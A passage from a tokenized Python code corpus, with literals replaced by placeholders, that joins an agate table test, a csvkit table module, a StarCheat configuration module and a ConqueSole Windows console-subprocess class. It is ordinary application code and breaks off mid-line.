normal_rows = ( <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:hello>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:hello>' , '<STR_LIT>' ) , <EOL> ) <EOL> self . assertRows ( normalized_table , normal_rows ) <EOL> self . assertColumnNames ( normalized_table , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertColumnTypes ( normalized_table , [ Text , Text , Text , Text ] ) <EOL> def test_denormalize_column_types ( self ) : <EOL> table = Table ( self . rows , self . column_names , self . column_types ) <EOL> normalized_table = table . denormalize ( None , '<STR_LIT>' , '<STR_LIT:value>' , column_types = [ Text ( ) , Number ( ) ] ) <EOL> normal_rows = ( <EOL> ( '<STR_LIT>' , <NUM_LIT> ) , <EOL> ) <EOL> self . assertRows ( normalized_table , normal_rows ) <EOL> self . assertColumnNames ( normalized_table , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertColumnTypes ( normalized_table , [ Text , Number ] ) <EOL> def test_denormalize_column_type_tester ( self ) : <EOL> table = Table ( self . rows , self . column_names , self . column_types ) <EOL> normalized_table = table . denormalize ( None , '<STR_LIT>' , '<STR_LIT:value>' , column_types = TypeTester ( force = { '<STR_LIT>' : Text ( ) } ) ) <EOL> normal_rows = ( <EOL> ( '<STR_LIT>' , <NUM_LIT> ) , <EOL> ) <EOL> self . assertRows ( normalized_table , normal_rows ) <EOL> self . assertColumnNames ( normalized_table , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertColumnTypes ( normalized_table , [ Text , Number ] ) </s>
<s> import csv <EOL> import datetime <EOL> import itertools <EOL> import agate <EOL> import six <EOL> from csvkit import typeinference <EOL> from csvkit . cli import parse_column_identifiers , make_default_headers <EOL> POSSIBLE_DELIMITERS = [ '<STR_LIT:U+002C>' , '<STR_LIT:\t>' , '<STR_LIT:;>' , '<STR_LIT:U+0020>' , '<STR_LIT::>' , '<STR_LIT:|>' ] <EOL> def sniff_dialect ( sample ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> dialect = csv . Sniffer ( ) . sniff ( sample , POSSIBLE_DELIMITERS ) <EOL> except : <EOL> dialect = None <EOL> return dialect <EOL> class InvalidType ( object ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class Column ( list ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , order , name , l , normal_type = InvalidType , blanks_as_nulls = True , infer_types = True ) : <EOL> """<STR_LIT>""" <EOL> if normal_type != InvalidType : <EOL> t = normal_type <EOL> data = l <EOL> elif not infer_types : <EOL> t = six . text_type <EOL> data = l <EOL> else : <EOL> t , data = typeinference . normalize_column_type ( l , blanks_as_nulls = blanks_as_nulls ) <EOL> list . __init__ ( self , data ) <EOL> self . order = order <EOL> self . name = name or '<STR_LIT>' <EOL> self . type = t <EOL> def __str__ ( self ) : <EOL> return str ( self . __unicode__ ( ) ) <EOL> def __unicode__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' % ( self . order , self . name , self . type ) <EOL> def __getitem__ ( self , key ) : <EOL> """<STR_LIT>""" <EOL> l = len ( self ) <EOL> if isinstance ( key , slice ) : <EOL> indices = six . moves . range ( * key . indices ( l ) ) <EOL> return [ ( list . __getitem__ ( self , i ) if i < l else None ) for i in indices ] <EOL> if key >= l : <EOL> return None <EOL> return list . __getitem__ ( self , key ) <EOL> def has_nulls ( self ) : <EOL> """<STR_LIT>""" <EOL> return True if None in self else False <EOL> def max_length ( self ) : <EOL> """<STR_LIT>""" <EOL> l = <NUM_LIT:0> <EOL> if self . type == six . text_type : <EOL> l = max ( len ( d ) if d else <NUM_LIT:0> for d in self ) <EOL> if self . has_nulls ( ) : <EOL> l = max ( l , <NUM_LIT:4> ) <EOL> return l <EOL> class Table ( list ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , columns = [ ] , name = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> list . __init__ ( self , columns ) <EOL> self . name = name <EOL> def headers ( self ) : <EOL> return [ c . name for c in self ] <EOL> def count_rows ( self ) : <EOL> lengths = [ len ( c ) for c in self ] <EOL> if lengths : <EOL> return max ( lengths ) <EOL> return <NUM_LIT:0> <EOL> @ classmethod <EOL> def from_csv ( cls , f , name = '<STR_LIT>' , sniff_limit = None , column_ids = None , blanks_as_nulls = True , column_offset = <NUM_LIT:1> , infer_types = True , no_header_row = False , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> contents = f . read ( ) <EOL> if sniff_limit is None : <EOL> kwargs [ '<STR_LIT>' ] = sniff_dialect ( contents ) <EOL> elif sniff_limit > <NUM_LIT:0> : <EOL> kwargs [ '<STR_LIT>' ] = sniff_dialect ( contents [ : sniff_limit ] ) <EOL> f = six . StringIO ( contents ) <EOL> rows = agate . csv . reader ( f , ** kwargs ) <EOL> try : <EOL> if no_header_row : <EOL> row = next ( rows ) <EOL> rows = itertools . chain ( [ row ] , rows ) <EOL> headers = make_default_headers ( len ( row ) ) <EOL> else : <EOL> headers = next ( rows ) <EOL> except StopIteration : <EOL> headers = [ ] <EOL> pass <EOL> if no_header_row or column_ids : <EOL> column_ids = parse_column_identifiers ( column_ids , headers , column_offset ) <EOL> headers = [ headers [ c ] for c in column_ids ] <EOL> else : <EOL> column_ids = range ( len ( headers ) ) <EOL> data_columns = [ [ ] for c in headers ] <EOL> width = len ( data_columns ) <EOL> for i , row in enumerate ( rows ) : <EOL> j = <NUM_LIT:0> <EOL> for j , d in enumerate ( row ) : <EOL> try : <EOL> data_columns [ j ] . append ( row [ column_ids [ j ] ] . strip ( ) ) <EOL> except IndexError : <EOL> break <EOL> j += <NUM_LIT:1> <EOL> while j < width : <EOL> data_columns [ j ] . append ( None ) <EOL> j += <NUM_LIT:1> <EOL> columns = [ ] <EOL> for i , c in enumerate ( data_columns ) : <EOL> columns . append ( Column ( column_ids [ i ] , headers [ i ] , c , blanks_as_nulls = blanks_as_nulls , infer_types = infer_types ) ) <EOL> return Table ( columns , name = name ) <EOL> def to_rows ( self , serialize_dates = False ) : <EOL> """<STR_LIT>""" <EOL> if serialize_dates : <EOL> out_columns = [ ] <EOL> for c in self : <EOL> if c . type in [ datetime . datetime , datetime . date , datetime . time ] : <EOL> out_columns . append ( [ six . text_type ( v . isoformat ( ) ) if v is not None else None for v in c ] ) <EOL> else : <EOL> out_columns . append ( c ) <EOL> return list ( zip ( * out_columns ) ) <EOL> else : <EOL> return list ( zip ( * self ) ) </s>
<s> from . i_naming_convention import INamingConvention <EOL> class NamingConventionUnderscore ( INamingConvention ) : <EOL> def getterName ( self , memberName ) : <EOL> return memberName <EOL> def setterName ( self , memberName ) : <EOL> return '<STR_LIT>' % memberName </s>
<s> """<STR_LIT>""" <EOL> import configparser <EOL> import os <EOL> import platform <EOL> if platform . system ( ) == "<STR_LIT>" : <EOL> config_folder = os . path . join ( os . path . expandvars ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> elif platform . system ( ) == "<STR_LIT>" : <EOL> config_folder = os . path . expanduser ( "<STR_LIT>" ) <EOL> else : <EOL> config_folder = os . path . expanduser ( "<STR_LIT>" ) <EOL> if not os . path . isdir ( config_folder ) : <EOL> os . mkdir ( config_folder ) <EOL> STARCHEAT_VERSION = "<STR_LIT>" <EOL> STARCHEAT_VERSION_TAG = "<STR_LIT>" <EOL> CONFIG_VERSION = <NUM_LIT:15> <EOL> ini_file = os . path . join ( config_folder , "<STR_LIT>" ) <EOL> class Config ( object ) : <EOL> def __init__ ( self ) : <EOL> self . config = configparser . ConfigParser ( ) <EOL> self . config_folder = config_folder <EOL> self . ini_file = ini_file <EOL> self . CONFIG_VERSION = CONFIG_VERSION <EOL> def read ( self , option ) : <EOL> self . config . read ( self . ini_file ) <EOL> return self . config [ "<STR_LIT>" ] [ option ] <EOL> def has_key ( self , option ) : <EOL> self . config . read ( self . ini_file ) <EOL> if "<STR_LIT>" in self . config : <EOL> return option in self . config [ "<STR_LIT>" ] <EOL> else : <EOL> return False <EOL> def set ( self , option , value ) : <EOL> self . config . read ( ini_file ) <EOL> self . config [ "<STR_LIT>" ] [ option ] = value <EOL> self . config . write ( open ( ini_file , "<STR_LIT:w>" ) ) <EOL> def create_config ( self , starbound_folder = None ) : <EOL> if starbound_folder is None : <EOL> starbound_folder = self . detect_starbound_folder ( ) <EOL> storage_folder = "<STR_LIT>" <EOL> assets_folder = os . path . join ( starbound_folder , "<STR_LIT>" ) <EOL> player_folder = os . path . join ( starbound_folder , storage_folder , "<STR_LIT>" ) <EOL> mods_folder = os . path . join ( starbound_folder , storage_folder , "<STR_LIT>" ) <EOL> backup_folder = os . path . join ( config_folder , "<STR_LIT>" ) <EOL> pak_hash = "<STR_LIT:none>" <EOL> check_updates = "<STR_LIT:yes>" <EOL> assets_db = os . path . join ( config_folder , "<STR_LIT>" ) <EOL> defaults = { <EOL> "<STR_LIT>" : starbound_folder , <EOL> "<STR_LIT>" : assets_folder , <EOL> "<STR_LIT>" : player_folder , <EOL> "<STR_LIT>" : mods_folder , <EOL> "<STR_LIT>" : backup_folder , <EOL> "<STR_LIT>" : pak_hash , <EOL> "<STR_LIT>" : assets_db , <EOL> "<STR_LIT>" : check_updates , <EOL> "<STR_LIT>" : CONFIG_VERSION <EOL> } <EOL> self . config [ "<STR_LIT>" ] = defaults <EOL> self . config . write ( open ( ini_file , "<STR_LIT:w>" ) ) <EOL> if not os . path . isdir ( backup_folder ) : <EOL> os . mkdir ( backup_folder ) <EOL> def remove_config ( self ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> os . remove ( ini_file ) <EOL> except FileNotFoundError : <EOL> pass <EOL> def detect_starbound_folder ( self ) : <EOL> known_locations = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> os . path . expanduser ( "<STR_LIT>" ) , <EOL> os . path . expanduser ( "<STR_LIT>" ) , <EOL> os . path . expanduser ( "<STR_LIT>" ) <EOL> ] <EOL> if platform . system ( ) == "<STR_LIT>" : <EOL> import winreg <EOL> try : <EOL> key = "<STR_LIT>" <EOL> if platform . machine ( ) . endswith ( '<STR_LIT>' ) : <EOL> key = "<STR_LIT>" <EOL> starbound_uninstall = winreg . OpenKey ( winreg . HKEY_LOCAL_MACHINE , key ) <EOL> starbound_path = winreg . QueryValueEx ( starbound_uninstall , "<STR_LIT>" ) [ <NUM_LIT:0> ] <EOL> known_locations . append ( os . path . normpath ( starbound_path ) ) <EOL> starbound_uninstall . Close ( ) <EOL> except OSError : <EOL> pass <EOL> try : <EOL> steam = winreg . OpenKey ( winreg . HKEY_CURRENT_USER , "<STR_LIT>" ) <EOL> steam_path = os . path . normpath ( winreg . QueryValueEx ( steam , "<STR_LIT>" ) [ <NUM_LIT:0> ] ) <EOL> known_locations . append ( os . path . join ( steam_path , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> steam . Close ( ) <EOL> except OSError : <EOL> pass <EOL> for path in known_locations : <EOL> if os . path . isdir ( path ) and os . path . isfile ( os . path . join ( path , "<STR_LIT>" , "<STR_LIT>" ) ) : <EOL> return path <EOL> return "<STR_LIT>" </s>
<s> """<STR_LIT>""" <EOL> import time <EOL> import re <EOL> import os <EOL> import ctypes <EOL> from conque_globals import * <EOL> from conque_win32_util import * <EOL> from conque_sole_shared_memory import * <EOL> class ConqueSoleSubprocess ( ) : <EOL> handle = None <EOL> pid = None <EOL> stdin = None <EOL> stdout = None <EOL> window_width = <NUM_LIT> <EOL> window_height = <NUM_LIT> <EOL> buffer_width = <NUM_LIT> <EOL> buffer_height = <NUM_LIT:100> <EOL> top = <NUM_LIT:0> <EOL> line_offset = <NUM_LIT:0> <EOL> output_blocks = <NUM_LIT:1> <EOL> cursor_line = <NUM_LIT:0> <EOL> cursor_col = <NUM_LIT:0> <EOL> data = [ ] <EOL> attributes = [ ] <EOL> attribute_cache = { } <EOL> default_attribute = <NUM_LIT:7> <EOL> shm_input = None <EOL> shm_output = None <EOL> shm_attributes = None <EOL> shm_stats = None <EOL> shm_command = None <EOL> shm_rescroll = None <EOL> shm_resize = None <EOL> is_alive = True <EOL> fast_mode = <NUM_LIT:0> <EOL> screen_redraw_ct = <NUM_LIT:0> <EOL> mem_redraw_ct = <NUM_LIT:0> <EOL> def open ( self , cmd , mem_key , options = { } ) : <EOL> """<STR_LIT>""" <EOL> self . reset = True <EOL> try : <EOL> try : <EOL> ctypes . windll . kernel32 . FreeConsole ( ) <EOL> except : <EOL> pass <EOL> self . buffer_height = CONQUE_SOLE_BUFFER_LENGTH <EOL> if '<STR_LIT>' in options and '<STR_LIT>' in options : <EOL> self . window_width = options [ '<STR_LIT>' ] <EOL> self . window_height = options [ '<STR_LIT>' ] <EOL> self . buffer_width = options [ '<STR_LIT>' ] <EOL> self . fast_mode = options [ '<STR_LIT>' ] <EOL> si = STARTUPINFO ( ) <EOL> si . dwFlags |= STARTF_USESHOWWINDOW <EOL> si . wShowWindow = SW_HIDE <EOL> flags = NORMAL_PRIORITY_CLASS | CREATE_NEW_PROCESS_GROUP | CREATE_UNICODE_ENVIRONMENT | CREATE_NEW_CONSOLE <EOL> pi = PROCESS_INFORMATION ( ) <EOL> res = ctypes . windll . kernel32 . CreateProcessW ( None , u ( cmd ) , None , None , <NUM_LIT:0> , flags , None , u ( '<STR_LIT:.>' ) , ctypes . byref ( si ) , ctypes . byref ( pi ) ) <EOL> self . pid = pi . dwProcessId <EOL> self . handle = pi . hProcess <EOL> for i in range ( <NUM_LIT:10> ) : <EOL> time . sleep ( <NUM_LIT> ) <EOL> try : <EOL> res = ctypes . windll . kernel32 . AttachConsole ( self . pid ) <EOL> break <EOL> except : <EOL> pass <EOL> self . stdout = ctypes . windll . kernel32 . GetStdHandle ( STD_OUTPUT_HANDLE ) <EOL> self . stdin = ctypes . windll . kernel32 . GetStdHandle ( STD_INPUT_HANDLE ) <EOL> size = COORD ( self . buffer_width , self . buffer_height ) <EOL> res = ctypes . windll . kernel32 . SetConsoleScreenBufferSize ( self . stdout , size ) <EOL> time . sleep ( <NUM_LIT> ) <EOL> self . set_window_size ( self . window_width , self . window_height ) <EOL> if '<STR_LIT>' in options and options [ '<STR_LIT>' ] > <NUM_LIT:0> : <EOL> if ctypes . windll . kernel32 . IsValidCodePage ( ctypes . c_uint ( options [ '<STR_LIT>' ] ) ) : <EOL> ctypes . windll . kernel32 . SetConsoleCP ( ctypes . c_uint ( options [ '<STR_LIT>' ] ) ) <EOL> ctypes . windll . kernel32 . SetConsoleOutputCP ( ctypes . c_uint ( options [ '<STR_LIT>' ] ) ) <EOL> self . init_shared_memory ( mem_key ) <EOL> self . tc = ctypes . create_unicode_buffer ( self . buffer_width ) <EOL> self . ac = ctypes . create_unicode_buffer ( self . buffer_width ) <EOL> return True <EOL> except : <EOL> return False <EOL> def init_shared_memory ( self , mem_key ) : <EOL> """<STR_LIT>""" <EOL> self . shm_input = ConqueSoleSharedMemory ( CONQUE_SOLE_INPUT_SIZE , '<STR_LIT:input>' , mem_key ) <EOL> self . shm_input . create ( '<STR_LIT>' ) <EOL> self . shm_input . clear ( ) <EOL> self . shm_output = ConqueSoleSharedMemory ( self . buffer_height * self . buffer_width , '<STR_LIT>' , mem_key , True ) <EOL> self . shm_output . create ( '<STR_LIT>' ) <EOL> self . shm_output . clear ( ) <EOL> if not self . fast_mode : <EOL> buf_info = self . get_buffer_info ( ) <EOL> self . shm_attributes = ConqueSoleSharedMemory ( self . buffer_height * self . buffer_width , '<STR_LIT>' , mem_key , True , chr ( buf_info . wAttributes ) , encoding = '<STR_LIT>' ) <EOL> self . shm_attributes . create ( '<STR_LIT>' ) <EOL> self . shm_attributes . clear ( ) <EOL> self . shm_stats = ConqueSoleSharedMemory ( CONQUE_SOLE_STATS_SIZE , '<STR_LIT>' , mem_key , serialize = True ) <EOL> self . shm_stats . create ( '<STR_LIT>' ) <EOL> self . shm_stats . clear ( ) <EOL> self . shm_command = ConqueSoleSharedMemory ( CONQUE_SOLE_COMMANDS_SIZE , '<STR_LIT>' , mem_key , serialize = True ) <EOL> self . shm_command . create ( '<STR_LIT>' ) <EOL> self . shm_command . clear ( ) <EOL> self . shm_resize = ConqueSoleSharedMemory ( CONQUE_SOLE_RESIZE_SIZE , '<STR_LIT>' , mem_key , serialize = True ) <EOL> self . shm_resize . create ( '<STR_LIT>' ) <EOL> self . shm_resize . clear ( ) <EOL> self . shm_rescroll = ConqueSoleSharedMemory ( CONQUE_SOLE_RESCROLL_SIZE , '<STR_LIT>' , mem_key , serialize = True ) <EOL> self . shm_rescroll . create ( '<STR_LIT>' ) <EOL> self . shm_rescroll . clear ( ) <EOL> return True <EOL> def check_commands ( self ) : <EOL> """<STR_LIT>""" <EOL> cmd = self . shm_command . read ( ) <EOL> if cmd : <EOL> if cmd [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> self . shm_command . clear ( ) <EOL> self . close ( ) <EOL> return <EOL> cmd = self . shm_resize . read ( ) <EOL> if cmd : <EOL> self . shm_resize . clear ( ) <EOL> if cmd [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> if cmd [ '<STR_LIT:data>' ] [ '<STR_LIT:width>' ] > self . buffer_width : <EOL> self . buffer_width = cmd [ '<STR_LIT:data>' ] [ '<STR_LIT:width>' ] <EOL> self . window_width = cmd [ '<STR_LIT:data>' ] [ '<STR_LIT:width>' ] <EOL> self . window_height = cmd [ '<STR_LIT:data>' ] [ '<STR_LIT>' ] <EOL> buf_info = self . get_buffer_info ( ) <EOL> self . reset_console ( buf_info , add_block = False ) <EOL> def read ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . screen_redraw_ct == <NUM_LIT:0> and not self . is_alive ( ) : <EOL> stats = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : self . cursor_line , '<STR_LIT>' : <NUM_LIT:0> } <EOL> self . shm_stats . write ( stats ) <EOL> return <EOL> self . check_commands ( ) <EOL> buf_info = self . get_buffer_info ( ) <EOL> curs_line = buf_info . dwCursorPosition . Y <EOL> curs_col = buf_info . dwCursorPosition . X <EOL> if curs_line != self . cursor_line or self . top != buf_info . srWindow . Top or self . screen_redraw_ct == CONQUE_SOLE_SCREEN_REDRAW : <EOL> self . screen_redraw_ct = <NUM_LIT:0> <EOL> read_start = self . top <EOL> read_end = max ( [ buf_info . srWindow . Bottom + <NUM_LIT:1> , curs_line + <NUM_LIT:1> ] ) <EOL> else : <EOL> read_start = curs_line <EOL> read_end = curs_line + <NUM_LIT:1> <EOL> coord = COORD ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> chars_read = ctypes . c_int ( <NUM_LIT:0> ) <EOL> for i in range ( read_start , read_end ) : <EOL> coord . Y = i <EOL> res = ctypes . windll . kernel32 . ReadConsoleOutputCharacterW ( self . stdout , ctypes . byref ( self . tc ) , self . buffer_width , coord , ctypes . byref ( chars_read ) ) <EOL> if not self . fast_mode : <EOL> ctypes . windll . kernel32 . ReadConsoleOutputAttribute ( self . stdout , ctypes . byref ( self . ac ) , self . buffer_width , coord , ctypes . byref ( chars_read ) ) <EOL> t = self . tc . value <EOL> if not self . fast_mode : <EOL> a = self . ac . value <EOL> if i >= len ( self . data ) : <EOL> for j in range ( len ( self . data ) , i + <NUM_LIT:1> ) : <EOL> self . data . append ( '<STR_LIT>' ) <EOL> if not self . fast_mode : <EOL> self . attributes . append ( '<STR_LIT>' ) <EOL> self . data [ i ] = t <EOL> if not self . fast_mode : <EOL> self . attributes [ i ] = a <EOL> try : <EOL> if self . mem_redraw_ct == CONQUE_SOLE_MEM_REDRAW : <EOL> self . mem_redraw_ct = <NUM_LIT:0> <EOL> for i in range ( <NUM_LIT:0> , len ( self . data ) ) : <EOL> self . shm_output . write ( text = self . data [ i ] , start = self . buffer_width * i ) <EOL> if not self . fast_mode : <EOL> self . shm_attributes . write ( text = self . attributes [ i ] , start = self . buffer_width * i ) <EOL> else : <EOL> for i in range ( read_start , read_end ) : <EOL> self . shm_output . write ( text = self . data [ i ] , start = self . buffer_width * i ) <EOL> if not self . fast_mode : <EOL> self . shm_attributes . write ( text = self . attributes [ i ] , start = self . buffer_width * i ) <EOL> stats = { '<STR_LIT>' : buf_info . srWindow . Top , '<STR_LIT>' : buf_info . wAttributes , '<STR_LIT>' : curs_col , '<STR_LIT>' : curs_line , '<STR_LIT>' : <NUM_LIT:1> } <EOL> self . shm_stats . write ( stats ) <EOL> self . top = buf_info . srWindow . Top <EOL> self . cursor_line = curs_line <EOL> if curs_line > buf_info . dwSize . Y - <NUM_LIT:200> : <EOL> self . reset_console ( buf_info ) <EOL> except : <EOL> pass <EOL> self . screen_redraw_ct += <NUM_LIT:1> <EOL> self . mem_redraw_ct += <NUM_LIT:1> <EOL> return None <EOL> def reset_console ( self , buf_info , add_block = True ) : <EOL> """<STR_LIT>""" <EOL> if add_block : <EOL> self . output_blocks += <NUM_LIT:1> <EOL> self . shm_output . close ( ) <EOL> self . shm_output = None <EOL> if not self . fast_mode : <EOL> self . shm_attributes . close ( ) <EOL> self . shm_attributes = None <EOL> mem_key = '<STR_LIT>' + str ( time . time ( ) ) <EOL> self . shm_output = ConqueSoleSharedMemory ( self . buffer_height * self . buffer_width * self . output_blocks , '<STR_LIT>' , mem_key , True ) <EOL> self . shm_output . create ( '<STR_LIT>' ) <EOL> self . shm_output . clear ( ) <EOL> if len ( self . data [ <NUM_LIT:0> ] ) < self . buffer_width : <EOL> for i in range ( <NUM_LIT:0> , len ( self . data ) ) : <EOL> self . data [ i ] = self . data [ i ] + '<STR_LIT:U+0020>' * ( self . buffer_width - len ( self . data [ i ] ) ) <EOL> self . shm_output . write ( '<STR_LIT>' . join ( self . data ) ) <EOL> if not self . fast_mode : <EOL> self . shm_attributes = ConqueSoleSharedMemory ( self . buffer_height * self . buffer_width * self . output_blocks , '<STR_LIT>' , mem_key , True , chr ( buf_info . wAttributes ) , encoding = '<STR_LIT>' ) <EOL> self . shm_attributes . create ( '<STR_LIT>' ) <EOL> self . shm_attributes . clear ( ) <EOL> if len ( self . attributes [ <NUM_LIT:0> ] ) < self . buffer_width : <EOL> for i in range ( <NUM_LIT:0> , len ( self . attributes ) ) : <EOL> self . attributes [ i ] = self . attributes [ i ] + chr ( buf_info . wAttributes ) * ( self . buffer_width - len ( self . attributes [ i ] ) ) <EOL> if not self . fast_mode : <EOL> self . shm_attributes . write ( '<STR_LIT>' . join ( self . attributes ) ) <EOL> self . shm_rescroll . write ( { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:data>' : { '<STR_LIT>' : self . output_blocks , '<STR_LIT>' : mem_key } } ) <EOL> size = COORD ( X = self . buffer_width , Y = self . buffer_height * self . output_blocks ) <EOL> res = ctypes . windll . kernel32 . SetConsoleScreenBufferSize ( self . stdout , size ) <EOL> time . sleep ( <NUM_LIT> ) <EOL> self . set_window_size ( self . window_width , self . window_height ) <EOL> self . tc = ctypes . create_unicode_buffer ( self . buffer_width ) <EOL> self . ac = ctypes . create_unicode_buffer ( self . buffer_width ) <EOL> def write ( self ) : <EOL> """<STR_LIT>""" <EOL> text = self . shm_input . read ( ) <EOL> if text == u ( '<STR_LIT>' ) : <EOL> return <EOL> self . shm_input . clear ( ) <EOL> chunks = CONQUE_WIN32_REGEX_VK . split ( text ) <EOL> if len ( chunks ) == <NUM_LIT:1> : <EOL> self . write_plain ( text ) <EOL> return <EOL> for t in chunks : <EOL> if t == '<STR_LIT>' : <EOL> continue <EOL> if CONQUE_WIN32_REGEX_VK . match ( t ) : <EOL> self . write_vk ( t [ <NUM_LIT:2> : - <NUM_LIT:2> ] ) <EOL> else : <EOL> self . write_plain ( t ) <EOL> def write_plain ( self , text ) : <EOL> """<STR_LIT>""" <EOL> li = INPUT_RECORD * len ( text ) <EOL> list_input = li ( ) <EOL> for i in range ( <NUM_LIT:0> , len ( text ) ) : <EOL> ke = KEY_EVENT_RECORD ( ) <EOL> ke . bKeyDown = ctypes . c_byte ( <NUM_LIT:1> ) <EOL> ke . wRepeatCount = ctypes . c_short ( <NUM_LIT:1> ) <EOL> cnum = ord ( text [ i ] ) <EOL> ke . wVirtualKeyCode = ctypes . windll . user32 . VkKeyScanW ( cnum ) <EOL> ke . wVirtualScanCode = ctypes . c_short ( ctypes . windll . user32 . MapVirtualKeyW ( int ( cnum ) , <NUM_LIT:0> ) ) <EOL> if cnum > <NUM_LIT> : <EOL> ke . uChar . UnicodeChar = uchr ( cnum ) <EOL> elif cnum == <NUM_LIT:3> : <EOL> ctypes . windll . kernel32 . GenerateConsoleCtrlEvent ( <NUM_LIT:0> , self . pid ) <EOL> ke . uChar . UnicodeChar = uchr ( cnum ) <EOL> ke . wVirtualKeyCode = ctypes . windll . user32 . VkKeyScanW ( cnum + <NUM_LIT> ) <EOL> ke . dwControlKeyState |= LEFT_CTRL_PRESSED <EOL> else : <EOL> ke . uChar . UnicodeChar = uchr ( cnum ) <EOL> if cnum in CONQUE_WINDOWS_VK_INV : <EOL> ke . wVirtualKeyCode = cnum <EOL> else : <EOL> ke . wVirtualKeyCode = ctypes . windll . user32 . VkKeyScanW ( cnum + <NUM_LIT> ) <EOL> ke . dwControlKeyState |= LEFT_CTRL_PRESSED <EOL> kc = INPUT_RECORD ( KEY_EVENT ) <EOL> kc . Event . KeyEvent = ke <EOL> list_input [ i ] = kc <EOL> events_written = ctypes . c_int ( ) <EOL> res = ctypes . windll . kernel32 . WriteConsoleInputW ( self . stdin , list_input , len ( text ) , ctypes . byref ( events_written ) ) <EOL> def write_vk ( self , vk_code ) : <EOL> """<STR_LIT>""" <EOL> code = None <EOL> ctrl_pressed = False <EOL> vk_attributes = vk_code . split ( '<STR_LIT:;>' ) <EOL> for attr in vk_attributes : <EOL> if attr == CONQUE_VK_ATTR_CTRL_PRESSED : <EOL> ctrl_pressed = True <EOL> else : <EOL> code = attr <EOL> li = INPUT_RECORD * <NUM_LIT:1> <EOL> ke = KEY_EVENT_RECORD ( ) <EOL> ke . uChar . UnicodeChar = uchr ( <NUM_LIT:0> ) <EOL> ke . wVirtualKeyCode = ctypes . c_short ( int ( code ) ) <EOL> ke . wVirtualScanCode = ctypes . c_short ( ctypes . windll . user32 . MapVirtualKeyW ( int ( code ) , <NUM_LIT:0> ) ) <EOL> ke . bKeyDown = ctypes . c_byte ( <NUM_LIT:1> ) <EOL> ke . wRepeatCount = ctypes . c_short ( <NUM_LIT:1> ) <EOL> if code in CONQUE_WINDOWS_VK_ENHANCED : <EOL> ke . dwControlKeyState |= ENHANCED_KEY <EOL> if ctrl_pressed : <EOL> ke . dwControlKeyState |= LEFT_CTRL_PRESSED <EOL> kc = INPUT_RECORD ( KEY_EVENT ) <EOL> kc . Event . KeyEvent = ke <EOL> list_input = li ( kc ) <EOL> events_written = ctypes . c_int ( ) <EOL> res = ctypes . windll . kernel32 . WriteConsoleInputW ( self . stdin , list_input , <NUM_LIT:1> , ctypes . byref ( events_written ) ) <EOL> def close ( self ) : <EOL> """<STR_LIT>""" <EOL> self . is_alive = False <EOL> try : <EOL> stats = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : self . cursor_line , '<STR_LIT>' : <NUM_LIT:0> } <EOL> self . shm_stats . write ( stats ) <EOL> except : <EOL> pass <EOL> pid_list = ( ctypes . c_int * <NUM_LIT:10> ) ( ) <EOL> num = ctypes . windll . kernel32 . GetConsoleProcessList ( pid_list , <NUM_LIT:10> ) <EOL> current_pid = os . getpid ( ) <EOL> for pid in pid_list [ <NUM_LIT:0> : num ] : <EOL> if not pid : <EOL> break <EOL> if pid == current_pid : <EOL> continue <EOL> try : <EOL> self . close_pid ( pid ) <EOL> except : <EOL> pass <EOL> try : <EOL> self . close_pid ( current_pid ) <EOL> except : <EOL> pass <EOL> def close_pid ( self , pid ) : <EOL> """<STR_LIT>""" <EOL> handle = ctypes . windll . kernel32 . OpenProcess ( PROCESS_TERMINATE , <NUM_LIT:0> , pid ) <EOL> ctypes . windll . kernel32 . TerminateProcess ( handle , - <NUM_LIT:1> ) <EOL> ctypes . windll . kernel32 . CloseHandle ( handle ) <EOL> def is_alive ( self ) : <EOL> """<STR_LIT>""" <EOL> status = ctypes . windll . kernel32 . WaitForSingleObject ( self . handle , <NUM_LIT:1> ) <EOL> if status == <NUM_LIT:0> : <EOL> self . is_alive = False <EOL> return self . is_alive <EOL> def get_screen_text ( self ) : <EOL> """<STR_LIT>""" <EOL> return "<STR_LIT:\n>" . join ( self . data ) <EOL> def set_window_size ( self , width , height ) : <EOL> """<STR_LIT>""" <EOL> window_size = SMALL_RECT ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> buf_info = self . get_buffer_info ( ) <EOL> window_size . Top = <NUM_LIT:0> <EOL> window_size . Left = <NUM_LIT:0> <EOL> if buf_info . dwMaximumWindowSize . X < width : <EOL> window_size . Right = buf_info . dwMaximumWindowSize . X - <NUM_LIT:1> <EOL> else : <EOL> window_size . Right = width - <NUM_LIT:1> <EOL> if buf_info . dwMaximumWindowSize . Y < height : <EOL> window_size . Bottom = buf_info . dwMaximumWindowSize . Y - <NUM_LIT:1> <EOL> else : <EOL> window_size . Bottom = height - <NUM_LIT:1> <EOL> res = ctypes . windll . kernel32 . SetConsoleWindowInfo ( self . stdout , ctypes . c_bool ( True ) , ctypes . byref ( window_size ) ) <EOL> buf_info = self . 